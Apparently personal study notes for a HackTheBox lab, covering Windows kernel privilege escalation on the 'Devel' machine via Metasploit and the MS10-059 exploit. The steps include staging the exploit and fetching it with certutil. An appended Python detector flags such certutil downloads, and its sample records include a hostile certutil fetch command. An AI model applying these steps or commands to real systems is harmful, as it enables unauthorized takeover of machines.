## Overview

![[image.BPHLW1.png]]

![[image.O2EHW1.png]]

- The reason we need "system info" is that specific kernel exploits depend on the exact Windows build (version, architecture, installed hotfixes).
- If we own the kernel, we own the system. That's what we are trying to do.

## Escalation with Metasploit (Example - Devel HTB)

1. Background the meterpreter session
   ![[image.BPVLW1.png]]
2. Search for and use the exploit suggested by the local exploit suggester
   ![[image.GMWMW1.png]]
3. Set the appropriate meterpreter session (and the other options)
   ![[image.T59QW1.png]]
4. Run it and get another meterpreter session!
   ![[image.ILWHW1.png]]
5. Be root
   ![[image.1GM9V1.png]]

## Manual Kernel Exploitation (Devel - HTB)

1. Search Google for the specific kernel exploit
   - ms10-015 doesn't work because we don't have GUI access, so keep working through the candidates and researching each one
   - The rest of the example uses MS10-059 (the chimichurri exploit)
2. Download the .exe to the attacking machine
   ![[image.59C9V1.png]]
3. Set up a Python HTTP server on the attacking machine to host the file for the victim to download
4. Go to the temp folder (we likely have write access there)
   ![[image.ZQL8V1.png]]
5. Download the file with the certutil command (similar to wget on Linux)
   ![[image.MLLGW1.png]]
6. Run the exploit with the proper syntax (ms.exe )
   ![[image.PR0HW1.png]]
7. On the attacking machine, open another listener on the correct port
   ![[image.EEODW1.png]]
8. Become root!
   ![[image.TYR6V1.png]]
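The certutil download in step 5 is a well-known living-off-the-land pattern that defenders can hunt for in process-creation telemetry. As an added example (not part of these notes), here is a small Python detector run over constructed, labelled sample records; the field names `user`, `image` and `cmdline` are assumed to come from a parsed Sysmon Event ID 1 or Security 4688 export.

```python
# Constructed process-creation records (not real logs); field names mimic a
# parsed Sysmon Event ID 1 / Security 4688 export. Host and URL are placeholders.
SAMPLE_EVENTS = [
    {"user": r"IIS APPPOOL\Web", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://192.0.2.10:8000/ms.exe ms.exe"},
    {"user": r"CORP\admin", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify cert.cer"},
    {"user": r"CORP\bob", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /c "systeminfo"'},
    {"user": r"CORP\bob", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -URLCache -f https://files.example.invalid/notes.txt C:\Windows\Temp\n.txt"},
]

# Extensions that indicate the fetched file is meant to be executed.
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".scr")


def parse_certutil_download(cmdline):
    """Return {'url', 'dest'} when cmdline is a certutil fetch, else None.
    certutil's -urlcache switch (normally with -f) pulls a remote file into the
    local URL cache and, when a trailing path is given, writes it to disk."""
    tokens = cmdline.split()
    lowered = [t.lower() for t in tokens]
    if "-urlcache" not in lowered:
        return None
    url_idx = next((i for i, t in enumerate(lowered) if "://" in t), None)
    if url_idx is None:
        return None
    # Destination is the first non-switch token after the URL, if there is one.
    rest = [t for t in tokens[url_idx + 1:] if not t.startswith("-")]
    return {"url": tokens[url_idx].strip('"'), "dest": rest[0] if rest else None}


def find_certutil_downloads(events):
    """Scan events; executables written to disk rank higher than plain fetches."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("certutil.exe"):
            continue
        parsed = parse_certutil_download(ev["cmdline"])
        if parsed is None:
            continue
        name = (parsed["dest"] or parsed["url"]).lower()
        severity = "high" if name.endswith(EXEC_EXT) else "medium"
        findings.append({"user": ev["user"], "severity": severity, **parsed})
    return findings


if __name__ == "__main__":
    for finding in find_certutil_downloads(SAMPLE_EVENTS):
        print(finding)
```

In a real deployment the same check would also pair with the preceding `systeminfo` run from the same low-privilege account, since that sequence is exactly the enumerate-then-download pattern the notes walk through.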